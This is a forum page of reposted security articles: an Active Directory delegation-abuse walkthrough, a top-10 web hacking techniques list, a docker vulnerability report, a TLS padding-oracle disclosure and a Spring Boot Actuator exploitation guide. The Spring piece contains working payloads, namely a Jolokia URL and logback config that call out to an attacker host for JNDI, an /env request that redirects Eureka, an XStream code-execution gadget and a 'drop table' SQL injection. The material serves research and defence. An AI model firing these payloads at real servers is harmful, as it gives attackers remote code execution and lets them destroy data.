Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    707

Everything posted by Nytro

  1. A Case Study in Wagging the Dog: Computer Takeover Will Feb 28 Last month, Elad Shamir released a phenomenal, in depth post on abusing resource-based constrained delegation (RBCD) in Active Directory. One of the big points he discusses is that if the TrustedToAuthForDelegation UserAccountControl flag is not set, the S4U2self process will still work but the resulting TGS is not FORWARDABLE. This resulting service ticket will fail for traditional constrained delegation, but will still work in the S4U2proxy process for resource-based constrained delegation. Does the first paragraph sound like Greek? Check out these resources so it makes it bit more sense: Matan Hart’s BlackHat Asia 2017 “Delegate to the Top” talk and whitepaper. The “S4U2Pwnage” post for background on traditional constrained delegation, including S4U2self/S4U2proxy. Ben Campbell’s “Trust? Years to earn, seconds to break” for another perspective on the same topic. CyberArk’s “Weakness Within: Kerberos Delegation” post on constrained delegation The “Another Word on Delegation” on the start of some of the resource-based constrained delegation (RBCD) material. Elad’s “Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory” for a complete set of details on his new RBCD research. Seriously, go read it. Why care? That’s what I hope to show in this post with a practical example, instead of doing my normal dive-into-insane-depth-on-a-topic thing. The tl;dr is that Elad’s new research gives us a generalized DACL-based computer takeover primitive (among other things, however I’m focusing just on this example for now). This means that if we have an ACE entry allowing us the ability to somehow modify a specific field for a computer object in Active Directory (specifically msDS-AllowedToActOnBehalfOfOtherIdentity, so rights would include GenericAll, GenericWrite, WriteOwner, etc.) we can abuse this access and a modified S4U Kerberos ticket request process to compromise the computer itself. Note: if DACLs, ACEs, and “object takeover” sounds like another dialect of Greek to you, check out Andy Robbins’ and my “Ace Up the Sleeve” talk and associated whitepaper for more security-focused DACL discussion. For another take on the subject, check out the “The Unintended Risks of Trusting Active Directory” talk that Lee Christensen, Matt Nelson, and myself gave at DerbyCon 2018. The tl;dr of the tl;dr is that if we can modify a computer object in Active Directory, we can compromise the computer itself in modern domains. There’s one caveat: the domain the computer resides in has to have at least one 2012+ domain controller in order to support the resource-based constrained delegation abuse. If this isn’t the case, and the domain only has domain controllers with Server 2008 (an 11 year old operating system) there are probably other issues you can target for abuse : ) Taking over a Computer Object Through Resource-Based Constrained Delegation I’m not going to explain resource-based constrained delegation in depth as the resources at the start of this post have all the information you need. Instead, I’m going to walk through a practical abuse example with syntax and screenshots illustrating the abuse so you can get a feel for how it works operationally. This scenario is fairly similar to the “Another Word on Delegation” post I published last year, as well as the “Generic DACL Abuse” section of Elad’s post. That is, there’s nothing new here, Elad covered everything in awesome depth with a ton of details and videos. I wanted to present a slightly different practical demonstration with full weaponization details in order to bring attention to his awesome research. My test environment will be my standard Windows Server 2012R2 domain controller with a 2012R2 domain functional level, and Windows 10 host: The domain is testlab.local with domain functional level 2012R2. The domain controller is primary.testlab.local, and is 2012R2. The client is Windows 10. The TESTLAB\attacker user account has GenericWrite access to the PRIMARY$ computer object, but has no other special privileges nor rights. The tools used are PowerView, Kevin Robertson’s Powermad (specifically the New-MachineAccount function), and Rubeus’ S4U command. A text transcript of this scenario is available here. First we’re going to load up our toolsets, confirm our identity, and verify that our current user has the proper DACL misconfiguration to allow abuse. Using PowerView to enumerate the specific ACE in the access control information for our target system (primary.testlab.local), we can see that we (TESTLAB\attacker) have GenericWrite over the PRIMARY$ computer object in Active Directory. The relevant syntax for these commands are here. As Elad details in his post, we need control of an account with a service principal name (SPN) set in order to weaponize the S4U2self/S4U2proxy process with resource-based constrained delegation. If we don’t have preexisting control of such an object, we can create a new computer object that will have default SPNs set. This is possible because MachineAccountQuota is set to 10 by default in domains, meaning that regular domains users can create up to ten new machine accounts. So let’s use the New-MachineAccount function in Kevin Robertson’s Powermad project to stand up “attackersystem$” with the password “Symmer2018!”. The relevant syntax for this command is here. The msDS-AllowedToActOnBehalfOfOtherIdentity field is an array of bytes representing a security descriptor. I couldn’t quite figure out all of the nuances of its structure, so I used the “official” way to add resource-based constrained delegation in my test lab, extracted the msDS-AllowedToActOnBehalfOfOtherIdentity field and converted it to SDDL form. From this template, we can easily substitute in the SID of the newly created computer account that we control (which has a SPN!), convert it back to binary form, and store it into the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer object we’re taking over using PowerView. The relevant syntax for these commands are here. Let’s double check that the security descriptor added correctly. We can see below that the SecurityIdentifier in the entry states that the computer account attackersystem$ has “AccessAllowed”. The relevant syntax for these commands are here. Let’s review: we’ve modified a special property of our target computer object (primary.testlab.local) to state that a computer account (TESTLAB\attackersystem$) is allowed to pretend to be anyone in the domain to the primary computer. Since we have the password of attackersystem$ (as we created it, again abusing MachineAccountQuota), we can authenticate as attackersystem$ and abuse the resource-constrained delegation process to compromise primary.testlab.local! In this case, we’re targeting the service name (sname) of cifs, the service that backs file system access. First let’s prove we don’t have access, and then get the RC4_HMAC hashed version of the password. Relevant syntax here. And thanks to Elad’s additions, we can execute this with a single Rubeus command. Relevant syntax here. Since PRIMARY$ is a domain controller, and the ldap service name backs the DCSync process, all we have to do is change the /msdsspn parameter from cifs/primary.testlab.local to ldap/primary.testlab.local if we wanted to DCSync instead. We can execute this for any service name (sname) we’d like to abuse. Once we’re done abusing the scenario, we can clean up with PowerView as well. Wrapup Elad’s post is one of the best that I’ve read in a long time. It’s filled with a ton of information and abuse scenarios that we’ll unpacking for a while as an industry. I strongly strongly recommend anyone who’s interested in these topics to start digesting Elad’s post- you’ll be that much better for it. I wanted to illustrate another example in this post to show how his research can be practically applied. We’re also in the process of updating the BloodHound schema, and hope to integrate these DACL based computer takeover primitives soon! Will Co-founder of Empire/BloodHound/Veil-Framework | PowerSploit developer | Microsoft PowerShell MVP | Security at the misfortune of others | http://specterops.io Sursa: https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783
  2. op 10 web hacking techniques of 2018 James Kettle | 27 February 2019 at 15:45 UTC The results are in! After an impressive 59 nominations followed by a community vote to pick 15 finalists, a panel consisting of myself and noted researchers Nicolas Grégoire, Soroush Dalili and Filedescriptor have conferred, voted, and selected the 10 most innovative new techniques that we think will withstand the test of time and inspire fresh attacks for years to come. We'll start at number 10, and count down towards the top technique of the year. 10. XS-Searching Google's bug tracker to find out vulnerable source code This blog post by Luan Herrera looks like a straightforward vulnerability write up, right up until he innovatively uses a browser cache timing technique to eliminate network latency from a notoriously unreliable technique, making it surprisingly practical. I think we can expect to see more XS-Search bugs in the future. 9. Data Exfiltration via Formula Injection In this blog post, Ajay and Balaji explore a number of techniques for exfiltrating data from spreadsheets in Google Sheets and LibreOffice. It might be less shiny than higher-ranked items, but this is practical, easily applicable research that will be invaluable for anyone looking to quickly prove the impact of a formula injection vulnerability. If you're wondering what malicious spreadsheets have to do with web security, check out Comma Separated Vulnerabilities. It's also worth mentioning that 2018 also brought us the first documented server-side formula injection. 8. Prepare(): Introducing novel Exploitation Techniques in WordPress WordPress is such a complex beast that exploiting it is increasingly becoming a stand-alone discipline. In this presentation, Robin Peraglie shares in-depth research of WordPress' misuse of double prepared statements, with a nice touch on PHP's infamous unserialize. 7. Exploiting XXE with local DTD files Attempts to exploit blind XXE often rely on loading external, attacker-hosted files and are thus sometimes thwarted by firewalls blocking outbound traffic from the vulnerable server. In a blog post described by Nicolas as 'how to innovate in a well-known field', Arseniy Sharoglazov shares a creative technique to avoid the firewall problem by using a local file instead. Although limited to certain XML parsers and configurations, when it works this technique could easily make the difference between a DoS and a full server compromise. It also provoked a follow up comment showing an even more flexible refinement. 6. It's A PHP Unserialization Vulnerability Jim But Not As We Know It It's been known in some circles for a while that harmless sounding file operations like file_exists() could be abused using PHP's phar:// stream wrapper to trigger deserialisation and obtain RCE, but Sam Thomas' whitepaper and presentation finally dragged it out into the light for good with a robust investigation of practical concerns and numerous exploitation case studies including our friend WordPress. 5. Attacking 'Modern' Web Technologies In which Frans Rosen shares some quality research showing that deprecated or not, you can abuse HTML5 AppCache for some wonderful exploits. He also discusses some interesting postMessage attacks exploiting client-side race conditions. 4. Prototype pollution attacks in NodeJS applications It's always great to see a language-specific vulnerability that doesn't affect PHP, and this research presented by Olivier Arteau at NorthSec is no exception. It details a novel technique to get RCE on NodeJS applications by using __proto__ based attacks that have previously only been applied to client-side applications. I suspect you could scan for this vulnerability by adding __proto__ as a magic word inside Backslash Powered Scanner, but be warned that this may semi-permanently take down vulnerable websites. 3. Beyond XSS: Edge Side Include Injection Continuing the theme of legacy web technologies getting a second wind as exploit vectors, Louis Dion-Marcil discovered that numerous popular reverse proxies sometimes let hackers abuse Edge Side Includes to give their XSS superpowers including SSRF. This quality research demonstrates numerous high impact exploit scenarios, and also proves it's more than just an XSS escalation technique, by enabling exploitation of HTML within JSON responses. 2. Practical Web Cache Poisoning: Redefining 'Unexploitable' This research by er James Kettle shows techniques to poison web caches with malicious content using obscure HTTP headers. I was naturally banned from voting/commenting on it, but the other panelists described it as 'excellent and extensive fresh research on an old topic', 'original and well executed research, with a very clear methodology', and 'simple yet beautiful'. I highly recommend taking a read, even if just so you can decide for yourself if I cheated my way to near-victory. 1. Breaking Parser Logic: Take Your Path Normalization off and Pop 0days Out! Orange Tsai has taken an attack surface many mistakenly thought was hardened beyond hope, and smashed it to pieces. His superb presentation shows how subtle flaws in path validation can be twisted with consistently severe results. The entire panel loved this research for its practicality, raw impact, and wide ranging fallout, affecting frameworks, standalone webservers, and reverse proxies alike. This is the second year running research by Orange has topped the board, so we'll be paying close attention during 2019! Runners up The huge number of nominations lead to a particularly brutal community vote this year, with numerous respectable pieces of research failing to make the shortlist. As such, if the top 10 leaves you clamouring for more you might want to peruse the entire nomination list as well as last year's top 10. What next? Looking ahead to next year, I'll try to make the community vote stage a bit slicker by doing a slightly stricter filter on nominations - in particular, I'll reject vulnerability writeups that purely apply known techniques in an unoriginal way. We'll also look into improving the vote UI, and perhaps allowing comments during voting so you can explain the reasoning behind your favourite research. This year's vote rolled around really quickly thanks to last year's occurring way behind schedule, but next year the process will be launched in January 2020. As usual, we're already open for nominations. Finally, I'd like to thank everyone in the community for your research, nominations, votes and patience. Till next year! James Kettle @albinowax Sursa: https://portswigger.net/blog/top-10-web-hacking-techniques-of-2018
      • 1
      • Upvote
  3. Top ten most popular docker images each contain at least 30 vulnerabilities February 26, 2019 | in Ecosystems, Open Source | By Liran Tal Welcome to Snyk’s annual State of Open Source Security report 2019. This report is split into several posts: Maven Central packages double; a quarter of a million new packages indexed in npm 88% increase in application library vulnerabilities over two years 81% believe developers should own security, but they aren’t well-equipped Open source maintainers want to be secure, but 70% lack skills Top ten most popular docker images each contain at least 30 vulnerabilities ReDoS vulnerabilities in npm spikes by 143% and XSS continues to grow 78% of vulnerabilities are found in indirect dependencies, making remediation complex Or download our lovely handcrafted pdf report which contains all of this information and more in one place. DOWNLOAD THE STATE OF OPEN SOURCE SECURITY REPORT 2019! Known vulnerabilities in docker images The adoption of application container technology is increasing at a remarkable rate and is expected to grow by a further 40% in 2020, according to 451 Research. It is common for system libraries to be available in many docker images, as these rely on a parent image that is commonly using a Linux distribution as a base. Docker images almost always bring known vulnerabilities alongside their great value We’ve scanned through ten of the most popular images with Snyk’s recently released docker scanning capabilities. The findings show that in every docker image we scanned, we found vulnerable versions of system libraries. The official Node.js image ships 580 vulnerable system libraries, followed by the others each of which ship at least 30 publicly known vulnerabilities. Snyk recently released its container vulnerability management solution to empower developers to fully own the security of their dockerized applications. Using this new capability, developers can find known vulnerabilities in their docker base images and fix them using Snyk’s remediation advice. Snyk suggests either a minimal upgrade, or alternative base images that contain fewer or even no vulnerabilities. Fix can be easy if you’re aware. 20% of images can fix vulnerabilities simply by rebuilding a docker image, 44% by swapping base image Based on scans performed by Snyk users, we found that 44% of docker image scans had known vulnerabilities, and for which there were newer and more secure base image available. This remediation advise is unique to Snyk. Developers can take action to upgrade their docker images. Snyk also reported that 20% of docker image scans had known vulnerabilities that simply required a rebuild of the image to reduce the number of vulnerabilities. Vulnerability differentiation based on image tag The current Long Term Support (LTS) version of the Node.js runtime is version 10. The image tagged with 10 (i.e: node:10) is essentially an alias to node:10.14.2- jessie (at the time that we tested it) where jessie specifies an obsolete version of Debian that is no longer actively maintained. If you had chosen that image as a base image in your Dockerfile, you’d be exposing yourself to 582 vulnerable system libraries bundled with the image. Another option is to use the node:10-slim image tag which provides slimmer images without unnecessary dependencies (for example: it omits the main pages and other assets). Choosing node:10-slim however would still pull in 71 vulnerable system libraries. Most vulnerabilities originate in the base image you selected. For that reason, remediation should focus on base image fixes The node:10-alpine image is a better option to choose if you want a very small base image with a minimal set of system libraries. However, while no vulnerabilities were detected in the version of the Alpine image we tested, that’s not to say that it is necessarily free of security issues. Alpine Linux handles vulnerabilities differently than the other major distros, who prefer to backport sets of patches. At Alpine, they prefer rapid release cycles for their images, with each image release providing a system library upgrade. Moreover, Alpine Linux doesn’t maintain a security advisory program, which means that if a system library has vulnerabilities, Alpine Linux will not issue an official advisory about it; Alpine Linux will mitigate the vulnerability by creating a new base image version including a new version of that library that fixes the issue, if one is available (as opposed to backporting as mentioned). There is no guarantee that the newer fixed version, of a vulnerable library will be immediately available on Alpine Linux, although that is the case many times. Despite this, if you can safely move to the Alpine Linux version without breaking your application, you can reduce the attack surface of your environment because you will be using fewer libraries. The use of an image tag, like node:10, is in reality an alias to another image, which constantly rotates with new minor and patched versions of 10 as they are released. A practice that some teams follow is to use a specific version tag instead of an alias so that their base image would be node:10.8.0-jessie for example. However, as newer releases of Node 10 are released, there is a good chance those newer images will include fewer system library vulnerabilities. Using the Snyk Docker scanning features we found that when a project uses a specific version tag such as node:10.8.0-jessie, we could then recommend newer images that contain fewer vulnerabilities. Known vulnerabilities in system libraries There is an increase in the number of vulnerabilities reported for system libraries, affecting some of the popular Linux distributions such as Debian, RedHat Enterprise Linux and Ubuntu. In 2018 alone we tracked 1,597 vulnerabilities in system libraries with known CVEs assigned for these distros, which is more than four times the number of vulnerabilities compared to 2017. As we look at the breakdown of vulnerabilities (high and critical) it is clear that this severity level is continuing to increase through 2017 and 2018. Continue reading: Maven Central packages double; a quarter of a million new packages indexed in npm 88% increase in application library vulnerabilities over two years 81% believe developers should own security, but they aren’t well-equipped Open source maintainers want to be secure, but 70% lack skills Top ten most popular docker images each contain at least 30 vulnerabilities ReDoS vulnerabilities in npm spikes by 143% and XSS continues to grow 78% of vulnerabilities are found in indirect dependencies, making remediation complex DOWNLOAD THE STATE OF OPEN SOURCE SECURITY REPORT 2019! Sursa: https://snyk.io/blog/top-ten-most-popular-docker-images-each-contain-at-least-30-vulnerabilities/
      • 1
      • Upvote
  4. TLS Padding Oracles The TLS protocol provides encryption, data integrity, and authentication on the modern Internet. Despite the protocol’s importance, currently-deployed TLS versions use obsolete cryptographic algorithms which have been broken using various attacks. One prominent class of such attacks is CBC padding oracle attacks. These attacks allow an adversary to decrypt TLS traffic by observing different server behaviors which depend on the validity of CBC padding. We evaluated the Alexa Top Million Websites for CBC padding oracle vulnerabilities in TLS implementations and revealed vulnerabilities in 1.83% of them, detecting nearly 100 different vulnerabilities. These padding oracles stem from subtle differences in server behavior, such as responding with different TLS alerts, or with different TCP header flags. We suspect the subtlety of different server responses is the reason these padding oracles were not detected previously. Full Technical Paper Robert Merget, Juraj Somorovsky, Nimrod Aviram, Craig Young, Janis Fliegenschmidt, Jörg Schwenk, Yuval Shavitt: Scalable Scanning and Automatic Classification of TLS Padding Oracle Vulnerabilities. USENIX Security 2019 The full paper will be presented at USENIX Security in August 2019. Who Is Affected? Since the identification of different vendors is fairly difficult and requires the cooperation of the scanned websites, a lot of our vulnerabilities are not attributed yet. On this Github page, we collect the current status of the responsible disclosure process and give an overview of the revealed vulnerabilities. The currently identified and fixed vulnerabilities are: OpenSSL. CVE-2019-1559. OpenSSL Security Advisory: 0-byte record padding oracle Citrix. CVE-2019-6485. TLS Padding Oracle Vulnerability in Citrix Application Delivery Controller (ADC) and NetScaler Gateway. F5. CVE-2019-6593. TMM TLS virtual server vulnerability CVE-2019-6593. The disclosure process is still running with a handful of vendors. Some of them consider to disable or even completely remove CBC cipher suites from their products. Recommendations for TLS Implementations Developers If you are developing a TLS implementation, this is obviously a good reminder to review your CBC code and make sure it does not expose a padding oracle; obviously, this is easier said than done. We therefore invite developers of TLS implementations to contact us in this matter. We will evaluate your implementation and if you are vulnerable, work with you to understand the nature of the vulnerability. (To be clear, we will do this free of charge). We will link the final version of our scanning tool detecting these vulnerabilities in the next days. Background Cipher Block Chaining (CBC) mode of operation The CBC mode of operation allows one to encrypt plaintexts of arbitrary length with block ciphers like AES or 3DES. In CBC mode, each plaintext block is XOR’ed to the previous ciphertext block before being encrypted by the block cipher. We simply refer to Wikipedia for more information. Padding oracle attacks exploit the CBC malleability. The problem of CBC is that it allows an attacker to perform meaningful plaintext modifications without knowing the symmetric key. More concretely, it allows an attacker to flip a specific plaintext bit by flipping a bit in the previous ciphtertext block. This CBC property has already been exploited in many attacks, for example, most recently in the Efail attack. CBC and its usage in the TLS record layer In order to protect messages (records) exchanged between TLS peers, it is possible to use different cryptographic primitives. One of them is a MAC combined with AES in CBC mode of operation. Unfortunately, TLS decided to use the MAC-then-PAD-then-Encrypt mechanism, which means that the encryptor first computes a MAC over the plaintext, then pads the message to achieve a multiple of block length, and finally uses AES-CBC to encrypt the ciphertext. For example, if we want to encrypt five bytes of data and use HMAC-SHA (with 20 bytes long output), we end up with two blocks. The second block needs to be padded with 7 bytes 0x06. Padding oracle attacks In 2002, Vaudenay showed that revealing padding failures after message decryption could have severe consequences for the security of the application. Since the CBC malleability allows an attacker to flip arbitrary message bytes, the attacker is also able to modify specific padding bytes. If the application decrypts the modified message and reports problems related to padding validity, the attacker is able to learn the underlying plaintext. We refer to this explanation by Erlend Oftedal for more details. In TLS, the attack is a bit more complex because the targeted TLS connection is always closed once invalid padding is triggered. Nevertheless, the vulnerability is practically exploitable in BEAST scenarios and allows the attacker to decrypt repeated secrets like session cookies. Therefore, it is very important that the TLS implementations do not reveal any information about padding validity. This includes different TLS alerts, connection states, or even timing behavior. Vulnerability Details OpenSSL (CVE-2019-1559) With the help of the Amazon security team, we identified a vulnerability which was mostly found on Amazon servers and Amazon Web Services (AWS). Hosts affected by this vulnerability immediately respond to most records with BAD_RECORD_MAC and CLOSE_NOTIFY alerts, and then close the connection. However, if the hosts encounter a zero-length record with valid padding and a MAC present, they do not immediately close the TCP connection, regardless of the validity of the MAC. Instead, they keep the connection alive for more than 4 seconds after sending the CLOSE_NOTIFY alert. This difference in behavior is easily observable over the network. Note that the MAC value does not need to be correct for triggering this timeout, it is sufficient to create valid padding which causes the decrypted data to be of zero length. Further investigations revealed that the Amazon servers were running an implementation which uses the OpenSSL 1.0.2 API. In some cases, the function calls to the API return different error codes depending on whether a MAC or padding error occurred. The Amazon application then takes different code paths based on these error codes, and the different paths result in an observable difference in the TCP layer. The vulnerable behavior only occurs when AES-NI is not used. Citrix (CVE-2019-6485) The vulnerable Citrix implementations first check the last padding byte and then verify the MAC. If the MAC is invalid, the server closes the connection. This is done with either a connection timeout or an RST, depending on the validity of the remaining padding bytes. However, if the MAC is valid, the server checks whether all other remaining padding bytes are correct. If they are not, the server responds with a BAD_RECORD_MAC and an RST (if they are valid, the record is well-formed and is accepted). This behavior can be exploited with an attack similar to POODLE. FAQ Can these vulnerabilities be exploited? Yes, but exploitation is fairly difficult. If you use one of the above implementations, you should still make sure you have patched. To be more specific, the attack can be exploited in BEAST scenarios. There are two prerequisites for the attack. First, the attacker must be able to run a script in the victim's browser which sends requests to a vulnerable website. This can be achieved tempting the victim to visit a malicious website. Second, the attacker must be able to modify requests sent by the browser and observe the server behavior. The second prerequisite is much harder to achieve, because the attacker must be an active Man-in-the-Middle. Have these vulnerabilities actually been exploited? We have no reason to believe these vulnerabilities have been exploited in the wild so far. I used a vulnerable implementation. Do I need to revoke my certificate? No, this attack does not recover the server's private key. Do I need to update my browser? No. These are server-side vulnerabilities, and can only be fixed by deploying a fix on the server. How many implementations are vulnerable? Our Alexa scans identified more than 90 different server behaviors triggered in our padding oracle scans. Some of them will probably be caused by outdated servers. However, we assume many of the newest servers will need fixes. How is this related to previous research? In 2002, Vaudenay presented an attack which targets messages encrypted with the CBC mode of operation. The attack exploits the malleability of the CBC mode, which allows altering the ciphertext such that specific cleartext bits are flipped, without knowledge of the encryption key. The attack requires a server that decrypts a message and responds with 1 or 0 based on the message validity. This behavior essentially provides the attacker with a cryptographic oracle which can be used to mount an adaptive chosen-ciphertext attack. The attacker exploits this behavior to decrypt messages by executing adaptive queries. Vaudenay exploited a specific form of vulnerable behavior, where implementations validate the CBC padding structure and respond with 1 or 0 accordingly. This class of attacks has been termed padding oracle attacks. Different types of CBC padding oracles have been used to break the confidentiality of TLS connections. These include Lucky Thirteen, Lucky Microseconds, Lucky 13 Strikes Back, and Ronen et al. Another important attack is POODLE (Padding Oracle On Downgraded Legacy Encryption) which targets SSLv3 and its specific padding scheme. In SSLv3 only the last padding byte is checked. Möller, Duong and Kotowicz exploited this behavior and showed that for implementation it is necessary to correctly verify all padding bytes. Similar behaviors were found in several TLS implementations. How is it possible that such an old vulnerability is still present in 2019? Writing this code correctly is very hard, even for experts. For example, in one instance experts have introduced a severe form of this vulnerability while attempting to patch the code to eliminate it. Identifying these vulnerabilities is also hard since some of them only manifest under a combination of specific conditions. For example, the OpenSSL vulnerability only manifests in OpenSSL version 1.0.2, only for non-stitched [1] cipher suites, when AES-NI is not used. It also requires subtle interactions between external code that calls the OpenSSL API, and the OpenSSL code itself. We take this opportunity to suggest deprecating CBC cipher suites in TLS altogether. [1]: Stitched ciphersuites is an OpenSSL term for optimised implementations of certain commonly used ciphersuites. See here for more details. Why are you not submitting your findings via BugBounty websites? We tried to get in contact with security teams via common BugBounty sites but had very bad experiences. Man-in-the-Middle attacks are usually out of scope for most website owners, and security teams did not know how to deal with this kind of issue. We lost a lot of "Points" on Hackerone and BugCrowd for reporting such issues (with the intention to learn the vendor) and learned absolutely nothing by doing this. All in all a very frustrating experience. We hope that our new approach of disclosure is more useful to get in contact with developers and vendors. Can this attack be used against Bitcoin? No. This attack is based on the vulnerability present in the Cipher Block Chaining (CBC) mode of operation. Bitcoin does not use CBC. However, if you are a blockchain designer, we strongly recommend you to evaluate the security of your block chaining technology and, especially, its padding scheme. Do you have a name or a logo for this vulnerability? No. Sorry, not this time. Sursa: https://github.com/RUB-NDS/TLS-Padding-Oracles
      • 2
      • Upvote
  5. Exploiting Spring Boot Actuators By Michael Stepankin Research Share this article: The Spring Boot Framework includes a number of features called actuators to help you monitor and manage your web application when you push it to production. Intended to be used for auditing, health, and metrics gathering, they can also open a hidden door to your server when misconfigured. When a Spring Boot application is running, it automatically registers several endpoints (such as '/health', '/trace', '/beans', '/env' etc) into the routing process. For Spring Boot 1 - 1.4, they are accessible without authentication, causing significant problems with security. Starting with Spring version 1.5, all endpoints apart from '/health' and '/info' are considered sensitive and secured by default, but this security is often disabled by the application developers. The following Actuator endpoints could potentially have security implications leading to possible vulnerabilities: /dump - displays a dump of threads (including a stack trace) /trace - displays the last several HTTP messages (which could include session identifiers) /logfile - outputs the contents of the log file /shutdown - shuts the application down /mappings - shows all of the MVC controller mappings /env - provides access to the configuration environment /restart - restarts the application For Spring 1x, they are registered under the root URL, and in 2x they moved to the "/actuator/" base path. Exploitation: Most of the actuators support only GET requests and simply reveal sensitive configuration data, but several of them are particularly interesting for shell hunters: 1. Remote Code Execution via '/jolokia' If the Jolokia Library is in the target application classpath, it is automatically exposed by Spring Boot under the '/jolokia' actuator endpoint. Jolokia allows HTTP access to all registered MBeans and is designed to perform the same operations you can perform with JMX. It is possible to list all available MBeans actions using the URL: http://127.0.0.1:8090/jolokia/list Again, most of the MBeans actions just reveal some system data, but one is particularly interesting: The 'reloadByURL' action, provided by the Logback library, allows us to reload the logging config from an external URL. It could be triggered just by navigating to: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml So, why should we care about logging config? Mainly because of two things: Config has an XML format, and of course, Logback parses it with External Entities enabled, hence it is vulnerable to blind XXE. The Logback config has the feature 'Obtaining variables from JNDI'. In the XML file, we can include a tag like '<insertFromJNDI env-entry-name="java:comp/env/appName" as="appName" />' and the name attribute will be passed to the DirContext.lookup() method. If we can supply an arbitrary name into the .lookup() function, we don't even need XXE or HeapDump because it gives us a full Remote Code Execution. How it works: 1. An attacker requests the aforementioned URL to execute the 'reloadByURL' function, provided by the 'qos.logback.classic.jmx.JMXConfigurator' class. 2. The 'reloadByURL' function downloads a new config from http://artsploit.com/logback.xml and parses it as a Logback config. This malicious config should have the following content: <configuration> <insertFromJNDI env-entry-name="ldap://artsploit.com:1389/jndi" as="appName" /> </configuration> 3. When this file is parsed on the vulnerable server, it creates a connection to the attacker-controlled LDAP server specified in the “env-entry-name” parameter value, which leads to JNDI resolution. The malicious LDAP server may return an object with 'Reference' type to trigger an execution of the supplied bytecode on the target application. JNDI attacks are well explained in this MicroFocus research paper. The new JNDI exploitation technique (described previously in our blog) also works here, as Tomcat is the default application server in the Spring Boot Framework. 2. Config modification via '/env' If Spring Cloud Libraries are in the classpath, the '/env' endpoint allows you to modify the Spring environmental properties. All beans annotated as '@ConfigurationProperties' may be modified and rebinded. Many, but not all, properties we can control are listed on the '/configprops' actuator endpoint. Actually, there are tons of them, but it is absolutely not clear what we need to modify to achieve something. After spending a couple of days playing with them we found this: POST /env HTTP/1.1 Host: 127.0.0.1:8090 Content-Type: application/x-www-form-urlencoded Content-Length: 65 eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream This property modifies the Eureka serviceURL to an arbitrary value. Eureka Server is normally used as a discovery server, and almost all Spring Cloud applications register at it and send status updates to it. If you are lucky to have Eureka-Client <1.8.7 in the target classpath (it is normally included in Spring Cloud Netflix), you can exploit the XStream deserialization vulnerability in it. All you need to do is to set the 'eureka.client.serviceUrl.defaultZone' property to your server URL ( http://artsploit.com/n/xstream) via '/env' and then call '/refresh' endpoint. After that, your server should serve the XStream payload with the following content: <linked-hash-set> <jdk.nashorn.internal.objects.NativeString> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string> </command> <redirectErrorStream>false</redirectErrorStream> </next> </iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilder</class> <name>start</name> <parameter-types/> </method> <name>foo</name> </filter> <next class="string">foo</next> </serviceIterator> <lock/> </cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer></ibuffer> </is> </dataSource> </dataHandler> </value> </jdk.nashorn.internal.objects.NativeString> </linked-hash-set> This XStream payload is a slightly modified version of the ImageIO JDK-only gadget chain from the Marshalsec research. The only difference here is using LinkedHashSet to trigger the 'jdk.nashorn.internal.objects.NativeString.hashCode()' method. The original payload leverages java.lang.Map to achieve the same behaviour, but Eureka's XStream configuration has a custom converter for maps which makes it unusable. The payload above does not use Maps at all and can be used to achieve Remote Code Execution without additional constraints. Using Spring Actuators, you can actually exploit this vulnerability even if you don't have access to an internal Eureka server; you only need an "/env" endpoint available. Other useful settings: spring.datasource.tomcat.validationQuery=drop+table+users - allows you to specify any SQL query, and it will be automatically executed against the current database. It could be any statement, including insert, update, or delete. exploiting_spring_boot_actuators_drop_table.png spring.datasource.tomcat.url=jdbc:hsqldb:https://localhost:3002/xdb - allows you to modify the current JDBC connection string. The last one looks great, but the problem is when the application running the database connection is already established, just updating the JDBC string does not have any effect. Hopefully, there is another property that may help us in this case: spring.datasource.tomcat.max-active=777 The trick we can use here is to increase the number of simultaneous connections to the database. So, we can change the JDBC connection string, increase the number of connections, and after that send many requests to the application to simulate heavy load. Under the load, the application will create a new database connection with the updated malicious JDBC string. I tested this technique locally agains Mysql and it works like a charm. exploiting_spring_boot_actuators_max_active.png Apart from that, there are other properties that look interesting, but, in practice, are not really useful: spring.datasource.url - database connection string (used only for the first connection) spring.datasource.jndiName - databases JNDI string (used only for the first connection) spring.datasource.tomcat.dataSourceJNDI - databases JNDI string (not used at all) spring.cloud.config.uri=http://artsploit.com/ - spring cloud config url (does not have any effect after app start, only the initial values are used.) These properties do not have any effect unless the '/restart' endpoint is called. This endpoint restarts all ApplicationContext but its disabled by default. There are a lot of other interesting properties, but most of them do not take immediate effect after change. N.B. In Spring Boot 2x, the request format for modifying properties via the '/env' endpoint is slightly different (it uses json format instead), but the idea is the same. An example of the vulnerable app: If you want to test this vulnerability locally, I created a simple Spring Boot application on my Github page. All payloads should work there, except for database settings (unless you configure it). Black box discovery: A full list of default actuators may be found here: https://github.com/artsploit/SecLists/blob/master/Discovery/Web-Content/spring-boot.txt. Keep in mind that application developers can create their own endpoints using @Endpoint annotation. Sursa: https://www.veracode.com/blog/research/exploiting-spring-boot-actuators
      • 1
      • Upvote
